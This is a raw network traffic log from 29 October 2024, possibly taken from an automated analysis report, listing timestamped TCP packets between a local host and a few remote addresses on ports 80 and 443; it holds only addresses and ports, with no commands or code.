                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.098431110 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.099735022 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.099755049 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.099766016 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.099772930 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.103069067 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.103128910 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.103374004 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.103579044 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.103611946 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.627259016 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.629393101 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.629409075 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.630053997 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.630064964 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.660655975 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.661456108 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.661473036 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.661900043 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.661905050 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.718655109 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.719542027 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.719551086 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.720128059 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.720132113 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.758270979 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.758522987 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.758621931 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.758811951 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.758830070 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.758856058 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.758867979 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.761562109 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.761598110 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.761682987 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.761836052 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.761843920 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.787410975 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793334007 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793353081 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793641090 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793757915 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793798923 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793823004 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793865919 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793908119 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.793912888 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.794013977 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.794032097 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.794042110 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.794048071 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.796638966 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.796716928 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.796812057 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.796943903 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.796978951 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.840305090 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.841321945 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.841350079 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.841754913 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.841768980 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.859822989 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.859896898 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.859968901 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.860167027 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.860179901 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.860204935 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.860209942 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.862786055 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.862808943 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.862916946 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.863173008 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.863177061 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.921562910 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.921631098 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.921796083 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.922085047 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.922102928 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.922112942 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.922120094 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.924685955 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.924714088 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.924783945 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.924904108 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.924916029 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971075058 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971098900 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971146107 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971214056 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971303940 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971627951 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971669912 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971774101 CET60593443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.971791029 CET4436059313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.974452972 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.974483013 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.974601984 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.974818945 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.974833012 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.606165886 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.608545065 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609133005 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609133005 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609146118 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609148026 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609364033 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609736919 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609739065 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609744072 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.609745026 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.610101938 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.610138893 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.610471010 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.610483885 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.655558109 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.659482002 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.659497023 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.659832954 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.659837961 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.712522030 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.714132071 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.714157104 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.714567900 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.714572906 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.735358953 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.735702038 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.736920118 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.736968994 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.736968994 CET60596443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.736987114 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.736995935 CET4436059613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.738460064 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.738630056 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.739109993 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.739140034 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.739156008 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.739197969 CET60594443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.739204884 CET4436059413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.739963055 CET60599443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.739995003 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.740061998 CET60599443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.740504026 CET60599443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.740516901 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.742013931 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.742086887 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.742180109 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.742302895 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.742337942 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745158911 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745300055 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745335102 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745543003 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745543003 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745613098 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745613098 CET60595443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745646000 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.745668888 CET4436059513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.747737885 CET60601443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.747772932 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.747869015 CET60601443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.747967958 CET60601443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.747983932 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.786339045 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.786411047 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.786673069 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.786689997 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.786698103 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.786736965 CET60597443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.786741972 CET4436059713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.789007902 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.789041042 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.789104939 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.789261103 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.789287090 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.802643061 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.808325052 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.846703053 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.846729040 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.846781015 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.846817970 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.846836090 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.847059965 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.847074986 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.847115040 CET60598443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.847121954 CET4436059813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.850186110 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.850219965 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.850411892 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.850559950 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.850574017 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.982187986 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.982259035 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.988425016 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.988473892 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.988544941 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.988960981 CET60604443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:57.988977909 CET4436060451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.478148937 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.478684902 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.478723049 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.479188919 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.479202986 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.483127117 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.483469963 CET60599443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.483491898 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.483880043 CET60599443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.483886003 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.529277086 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.530401945 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533133984 CET60601443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533148050 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533252954 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533286095 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533674955 CET60601443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533679962 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533765078 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.533776999 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.577860117 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.578347921 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.578372002 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.579001904 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.579008102 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.609064102 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.609184980 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.609580040 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.609632015 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.609664917 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.609744072 CET60600443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.609762907 CET4436060013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.614321947 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.614748001 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.614824057 CET60599443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.615948915 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.616009951 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.616251945 CET60599443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.616266966 CET4436059913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.616296053 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.617518902 CET60605443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.617553949 CET4436060513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.618704081 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.618740082 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.618801117 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.618930101 CET60606443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.618948936 CET4436060613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.662070036 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.662144899 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.662233114 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.662425995 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.662446976 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.662472010 CET60602443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.662483931 CET4436060213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.665131092 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.665163994 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.665261984 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.665420055 CET60607443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:58.665446043 CET4436060713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745091915 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745116949 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745166063 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745176077 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745213985 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745488882 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745507956 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745517969 CET60603443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745523930 CET4436060313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745865107 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745902061 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.745954990 CET4436060113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.746010065 CET60601443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:59.746254921 CET60601443192.168.2.513.107.246.45
